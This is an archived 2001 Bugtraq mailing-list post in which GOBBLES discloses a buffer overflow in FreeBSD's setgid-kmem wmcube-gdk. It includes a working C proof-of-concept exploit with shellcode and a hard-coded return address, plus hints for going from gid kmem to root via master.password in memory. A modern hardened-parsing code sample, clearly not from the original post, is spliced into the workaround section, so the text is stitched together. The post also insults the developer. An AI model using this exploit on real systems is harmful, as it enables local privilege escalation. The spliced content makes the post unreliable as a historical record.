New Advisory + Exploit

From: bugtraq (bugtraqat_private)
Date: Mon Dec 17 2001 - 15:13:39 PST


    Hello everyone. 
    
    GOBBLES Labs proudly presents yet another advisory + exploit.  Today's
    product is wmcube-gdk, which is sgid(kmem) after installation from
    FreeBSD's Ports collection.  After successful exploitation of the bug,
    gaining root privileges is trivial.  See attached advisory for details. 
    
    GOBBLES Labs
    http://www.bugtraq.org 
    
    
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
    ++++++++++++++GOBBLES+SECURITY+RESEARCH+TEAM+INCORPORATED+++++++++++++++++ 
          ALERT! ALERT! FREEBSD LOCAL ROOT VULNERABILITY! ALERT! ALERT! 
    ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
    
    #include "/var/spool/uucppublic/.gbbls/note.h"
    
       "Love doesn't make the world go 'round, 
        love is what makes the ride worthwhile."
    
       Alicia is in love!!! ---^
    
    GOBBLES and he group do proudly present advisory on local root hole in
    FreeBSD that can also work for the Linux, but GOBBLES did find hole when
    doing comprehensive ports audit.  GOBBLES didn't see any real need to
    waste time on crappy program exploits for other operating systems and
    suspect this one is enough to teach programmer timecop lesson in manners
    and one in humility.
    
    PRODUCT
    *******
    
    Program: 
      -r-xr-sr-x  1 root  kmem  20376 Dec 17 11:28 /usr/X11R6/bin/wmcube-gdk
    
    FreeBSD port: 
      /usr/ports/sysutils/wmcube-gdk
    
    Author WWW:
      http://www.ne.jp/asahi/linux/timecop/
    
    
    BACKGROUND
    **********
    
    GOBBLES crack he knuckles as he prepare to exercise copy/paste talent then
    does submit the following to eyes of eager readers:
    
    WMCube / GDK
    This is modified and optimized version of wmCube 0.98, originally
      available at this website.
      Changes include much faster redraws, significantly lower CPU usage, ability
      to specify color for both flat-shaded and wireframe objects, and transparent
      CPU load / zoom buttons.  Sorry, the "roll-in" sequence of original wmCube
      has been removed.  But with all these cool new features it's unlikely you
      are going to miss it too long :)  wmCube author is too busy to look over
      my changes, so I am making them available here, with his approval :)
      Note, Makefiles for systems other than Linux will need to be modified to
      use gdk libraries.  Check out README.GDK inside the tarball for some hints
      where to start.  If you make changes for your system, please send me
      updated Makefile.  Thank you.
    
    
    PROBLEM
    *******
    
    GOBBLES notice user can specify object description file which overflow
    small buffer which then transform wmcube-gdk into swiss army knife with
    gid(kmem) privs.  For all critics who say, "this not root if it only
    gid(kmem)!" GOBBLES say, "Go back to security-basic mailing list to learn
    trick for quickly becoming uid(root) on the FreeBSD and other OS when you
    have gid(kmem).  GOBBLES think that all people who quick to criticize
    GOBBLES when all he really doing is saying things in tricky way to invite
    criticism from ignorant so that GOBBLES can mock them are just complete
    idiots who spend way too much time trying to get three years of "security
    experience" so they can go take 250 question CISSP test and then let the
    world know on mailing lists that they have elite whitehat pussy ethical
    hacker with no skill certification (which is what CISSP stand
    for).  Anyhow, you idiots know who you are, and beware that any mockery of
    GOBBLES by inexperienced and unskilled critics who brag certifications
    will not be accepted, dummies.  Hehehe GOBBLES got off on a little dark
    tangent from he speech and will now get back to original subject, which is
    local root exploit in wmcube-gdk.
    
    Funny thing that GOBBLES did notice is that wmcube program that wmcube-gdk
    is based off is not vulnerable to this bug (but is to others, go do
    sourcecode audit before GOBBLES make monkey out of you!), so the fault is
    entirely belonging to programmer timecop... encourage him to stop writing
    code with silly beginner style mistakes.  Stupid mistakes made by stupid
    beginner programmer.
    
    VENDOR NOTIFICATION STATUS
    **************************
    
    GOBBLES first do privmsg timecop: identify tricks on efnet with long
    string to see who make right rules for Ettercap exploit (snort.org
    official ones worthless, but idiot criticize us!) hehe then GOBBLES did
    proceed to try and discuss issue with programmer timecop but did not get
    any response from self-righteous bastard so oh well GOBBLES not really
    caring to help anymore.  Important for software programmers to all be
    active subscribers and contributors to securityfocus.com mailing lists so
    they can find out about earthshattering bugs that indirectly affect their
    code and then can go audit and fix new bugs, understand what GOBBLES wants
    you developers all to do?
    
    TECHNICAL DETAILS
    *****************
    
    Here problem GOBBLES did spot in wmcube.c, in the function loadobj().
    
    int loadobj(char *filename)
    {
        FILE *fp;
        char tmp[64] = { "" };
        int i = 0, counter = 1;
    
    10:
        ...
    
        fscanf(fp, "%s", tmp);
    
        ...
    
        goto 10;
    
    }
    
    
    As you can see, programmer pick to choose data in 64 bytes small buffer,
    which is OK but the problem is the fscanf(fp, "%s", tmp); trick used
    multiple times in code he make of loadobj().  Bad decision by newbie
    programmer who do not understand that penetrator can specify own object
    description file with -o argument and put long lines in it and then
    overflowing 64 byte buffer!  Good thing GOBBLES catch all bugs in
    software, hehe!
    
    WORKAROUND
    **********
    
    [0x01]
    Shutdown your computer until an official fix is available..
    
    ..OR..
    
    [0x02] 
    Replace fscanf(fp, "%s", tmp); in loadobj(), wmcube.c with
    fgets(tmp, 64, fp);.
    Then uninstall bad wmcube-gdk, recompile and do a new install!
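
    The hardened read below is an added example and is not code from
    wmcube-gdk or from GOBBLES; the function names, the enum, the file layout
    and the sample inputs are all assumptions.  It keeps loadobj()'s 64-byte
    buffer but replaces fscanf(fp, "%s", tmp) with a width-limited
    fscanf(fp, "%63s", tmp), which cannot write past the buffer, and then
    peeks at the next character so that a token longer than 63 bytes is
    rejected instead of being silently split in two.  Unlike the
    fgets(tmp, 64, fp) workaround above, this keeps the whitespace-delimited
    token semantics the rest of loadobj() relies on (fgets reads a whole
    line, newline included).  tmpfile() stands in for the file named by -o so
    the example runs offline.

```c
/* Added example: a bounded token reader for a wmcube-style object file.
 * Not wmcube-gdk's own code; names, layout and sample data are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define TOKEN_MAX 64          /* same size as loadobj()'s char tmp[64] */

enum load_status {
    LOAD_OK = 0,              /* every token fitted in the buffer */
    LOAD_TOKEN_TOO_LONG = 1,  /* a token would have overrun tmp[64]: rejected */
    LOAD_BAD_HEADER = 2,      /* file does not start with WMCUBE_COORDINATES */
    LOAD_IO_ERROR = 3
};

/* Replacement for fscanf(fp, "%s", tmp).  The width 63 (TOKEN_MAX - 1)
 * makes fscanf stop before the buffer is full.  If the character after
 * the stored token is neither whitespace nor EOF, the token was longer
 * than the buffer and is refused rather than silently truncated.
 * Returns 1 on a token, 0 on EOF, -1 on an over-long token. */
static int read_token(FILE *fp, char tmp[TOKEN_MAX])
{
    int c;
    if (fscanf(fp, "%63s", tmp) != 1)
        return 0;
    c = fgetc(fp);
    if (c == EOF)
        return 1;
    if (!isspace(c))
        return -1;
    ungetc(c, fp);
    return 1;
}

/* Parse an object description held in memory.  tmpfile() stands in for
 * the -o file so the reader goes through the same FILE* path as loadobj().
 * On LOAD_OK, *ntokens receives the number of tokens after the header. */
enum load_status load_object(const char *text, int *ntokens)
{
    char tmp[TOKEN_MAX];
    int rc, count = 0;
    FILE *fp = tmpfile();
    if (fp == NULL)
        return LOAD_IO_ERROR;
    if (fputs(text, fp) == EOF) {
        fclose(fp);
        return LOAD_IO_ERROR;
    }
    rewind(fp);

    rc = read_token(fp, tmp);
    if (rc != 1 || strcmp(tmp, "WMCUBE_COORDINATES") != 0) {
        fclose(fp);
        return rc == -1 ? LOAD_TOKEN_TOO_LONG : LOAD_BAD_HEADER;
    }
    while ((rc = read_token(fp, tmp)) == 1)
        count++;
    fclose(fp);
    if (rc == -1)
        return LOAD_TOKEN_TOO_LONG;
    *ntokens = count;
    return LOAD_OK;
}

/* Token count on success, -1 if the object is rejected for any reason. */
int count_tokens(const char *text)
{
    int n = 0;
    return load_object(text, &n) == LOAD_OK ? n : -1;
}

/* Boundary check: does a single token of exactly `len` bytes load cleanly? */
int token_of_length_loads(size_t len)
{
    char text[256];
    if (len > 200)
        return 0;
    memcpy(text, "WMCUBE_COORDINATES ", 19);
    memset(text + 19, 'A', len);
    text[19 + len] = '\0';
    return count_tokens(text) >= 0;
}

/* Constructed sample inputs, not taken from any real wmcube object file. */
const char *good_object =
    "WMCUBE_COORDINATES\n"
    "1 0 -42 42\n"
    "WMCUBE_LINES\n"
    "1 1\n";

const char *overlong_object =
    "WMCUBE_COORDINATES\n"
    "1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 0 -42 42\n";

int main(void)
{
    printf("good object: %d tokens\n", count_tokens(good_object));
    printf("over-long token rejected: %s\n",
           count_tokens(overlong_object) == -1 ? "yes" : "no");
    return 0;
}
```

    Compile with `cc -Wall example.c` and run it.  The same peek-after-read
    check works for every fscanf("%s") site in loadobj(): the width keeps
    the write inside tmp, and the peek turns a would-be overflow into a
    clean parse error.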
    
    
    DEMONSTRATION
    *************
    
    GOBBLES do some more copy/paste acrobatics to show better idea of how this
    vulnerability exists and stuff.
    
    <snip>
      ===>   Registering installation for wmcube-gdk-0.98p1
      ===>  SECURITY NOTE: 
          This port has installed the following binaries which execute with
          increased privileges.
      667014   40 -r-xr-sr-x    1 root             kmem                20376 Dec 17 09:43 /usr/X11R6/bin/wmcube-gdk
    
          If there are vulnerabilities in these programs there may be a security
          risk to the system. FreeBSD makes no guarantee about the security of
          ports included in the Ports Collection. Please type 'make deinstall'
          to deinstall the port if this is a concern.
    
          For more information, and contact details about the security
          status of this software, see the following webpage: 
      http://www.ne.jp/asahi/linux/timecop/
    </snip>
    
    
      GOBBLES@freegobbles:~$ ./GOBBLESwmc	# GOBBLES whitehat PoC exploit
      GOBBLES!
      uid=1001(GOBBLES) gid=1001(GOBBLES) groups=1001(GOBBLES), 2(kmem)
      GOBBLES@freegobbles:~$
    
    As you can see, GOBBLES had Andrew write pussy whitehat style PoC exploit
    to keep penetrators from using it maliciously (GOBBLES certain this futile
    effort to keep weapons out of penetrator hands though, since someone will
    undoubtedly "fix" exploit then republish it showing how smart they are for
    being able to "fix" simple things, idiots not understanding the reason for
    distributing in PoC format).
    
    
    CONCLUSION
    **********
    
    Since there is security vulnerability in sgid kmem program GOBBLES decide 
    to deinstall package so no evil penetrators may sneak into GOBBLES private 
    kernel memory$!@#%.
    
    
      root@freegobbles:/usr/ports/sysutils/wmcube-gdk# make deinstall
      ===>  Deinstalling for wmcube-gdk-0.98p1
      root@freegobbles:/usr/ports/sysutils/wmcube-gdk#
    
    
    Now, GOBBLES feels much safer, hehehe.
    
    
    So, what GOBBLES learn this time?
    Fancy program might not be secure!  Similar to philosophy of writing
    exploits in penetrator program Ettercap, but slightly different since
    wmcube-gdk just fancy program, and not evil penetrator program, hehe.
    
    
    POC EXPLOIT
    ***********
    
    This hole give root indirectly after getting gid(kmem).  GOBBLES suggest
    trying strings in memory to find master.password then using Mickey Mouse
    Hacking Squadron UnicOS exploits to gain root on Cray's to do password
    cracking to get root, then do su root - trick to get root on
    machine.  From GOBBLES extensive research into subject matter of root
    password he find that most FreeBSD root password are "love", but that is
    not GOBBLES root password so do not even try, hehe!
    
    This time GOBBLES choose to not include shellcode that execve() /bin/bash
    so FreeBSD admin can feel safe until author patches he program!
    
    
    /*
     * (c) Andrew / GOBBLES Security
     *
     * PoC exploit for wmcube-gdk
     *
     * Usage: /path/to/GOBBLES-wmcube-gdk-exploit [offset]
     *
     */
    
    #include <sys/types.h>  /* u_long */
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>  
    #include <errno.h>
    
    unsigned char GOBBLES_shellcode[] =
    "\xb8\xf5\xf5\xff\xff\xf7\xd0\x50\xb8\xb3\xba\xac\xde\xf7\xd0\x50"
    "\xb8\xb8\xb0\xbd\xbd\xf7\xd0\x50\x89\xe6\x31\xc0\x31\xdb\xb0\xf5"
    "\xf6\xd0\x50\x56\x53\xb0\x04\x50\xcd\x80\xb0\x01\x50\xcd\x80";
    
    
    
    
    int main(int argc, char **argv) {
            FILE *fd;
            int i;
            u_long retaddy = 0xbfbff634;
    
            if(argc == 2)
                    retaddy += atoi(argv[1]);
    
            /* build the object description file that wmcube-gdk loads with -o */
            fd = fopen(".gobbles", "wt");
            if(fd == NULL) {
                    perror("fopen");
                    return 1;
            }
            fprintf(fd, "WMCUBE_COORDINATES\n");
            fprintf(fd, "1aaa");    // atoi()..
      
       
            for(i = 0; i < 64; i += 8)
                    fprintf(fd, "GOBBLES!");
    
            printf("GOBBLES: Using %lx as retaddy\n", retaddy);
            fflush(NULL);
            fwrite(&retaddy, 4, 1, fd);
            fprintf(fd, "GOBBLES!");
            fprintf(fd, "GOBBLES!");   
    
            fprintf(fd, "%s", GOBBLES_shellcode);
            fprintf(fd, " 0 -42 42\n");
            fprintf(fd, "WMCUBE_LINES\n");
            fprintf(fd, "1 1\n");
    
            fclose(fd);
    
            /* the argument list must end with a null pointer, not a plain 0 */
            execl("/usr/X11R6/bin/wmcube-gdk", "wmcube-gdk", "-o", ".gobbles", (char *)NULL);
    
            /* only reached if execl() fails */
            unlink(".gobbles");     /* Mum always told me to cleanup when im done! */
            fprintf(stderr, "System immune against GOBBLES exploit!\n");
    
            return 0;
    }
    
    
    
    
    GREETS
    ******
    
    dianora, tsk, snow, carolyn meinel, john vranesevich, steve gibson, kimble,
    knightmare, emmanuel goldstein, box.sk, @stake, securityfocus, sans.org,
    blackhat.com, defcon.org, 2600.com, #phrack@efnet, #hackphreak@undernet,
    bugtraq (thanks aleph1 and david ahmad for devoting your time to a great
    list), ntbugtraq (russel the love muscle ;D), cert.org, paul vixie, vesselin
    bontchev, reese witherspoon, kirsten dunst, katie holmes, aleister crowley,
    manly p hall, franz bardon, dennis ritchie, nietzsche, w. richard stevens,
    radiohead, george michael, larry wall, beethoven, francis bacon, bruce
    willis, bruce schneier, alan turing, john von neumann, donald knuth, michael
    abrash, robert sedgewick, richard simmons, government boy, ralph lauren,
    kevin mitnick, david koresh, the violent femmes, legions of doom, quentin
    tarantino, JUPES, security.nnov.ru, dugsong, wayne gretzky,
    hhp-programming.net, so1o, the HaX0R bRoThErS, nasa.gov, alfred hitchcock,
    ray bradbury, linux torvalds, alyssa milano, sarah michelle geller, jennifer
    lopez, catherine zeta jones, robert de niro, plato, leonardo da vinci,
    nostradamus, adam weishaupt, adema, kmfdm, eliphas levi, john dee, goo goo
    dolls, savage garden, george bush, john howard, tony blair, ashida kim,
    andrew tanenbaum, comp.lang.c, solar designer, patanjali, vayu siddhi,
    deepak chopra, ajna chakra, fuzzy bunny, lockdown, bronc buster,
    attrition.org, cliff stoll, bill gates, alan cox, george harrison,
    berkeley.edu, microsoft.com, isox, american mcgee, princess toadstool, ru
    paul, sharon stone, taeho oh, napster, nocarrier, steve wozniak, captian
    crunch, tony the tiger, julliette lewis, oliver twist, yakko, wakko (but
    no dot), santa claus, the easter bunny, the christmas tree, hacktech.org,
    mixter and the rest of #darknet/2xs, the planet Pluto, pluto the dog (from
    walt disney), walt disney, the smurfs, packetstormsecurity.org, chocolate, 
    caramel, marshmallows, rice crispies, rice crispie treats, cousin WOBBLES, 
    rfp, Alan@packetstorm, george bush senior, george w. bush, his drunken 
    daughters, gary coleman, fat albert, rhino9, eEye.com (hehe good work on
    application firewall thing or whatever), the djali zwan, digital unix,
    o'reilly & associates (smart folk selling sketches on cover of book filled
    with printed manpages with little bit of funny jokes, hehe they rich now),
    hwa-security.net, #malvu/efnet, donkey kong, diddy kong, p diddy (GOBBLES
    not understand the english in this name? but he good artist anyway), mr.
    peanut, all girls who pose naked on webcam for GOBBLES, mr goldilocks (you
    memory live on forever, old chum), checkpoint.com (thank you for free stuff
    like nice new shirt and pen and golf tees that all say Checkpoint, hehe),
    whoever invented deoderant, monkey.org, and all our friends and family.
    
    
    GOBBLES SECURITY
    http://www.bugtraq.org/
    



    This archive was generated by hypermail 2b30 : Mon Dec 17 2001 - 15:54:23 PST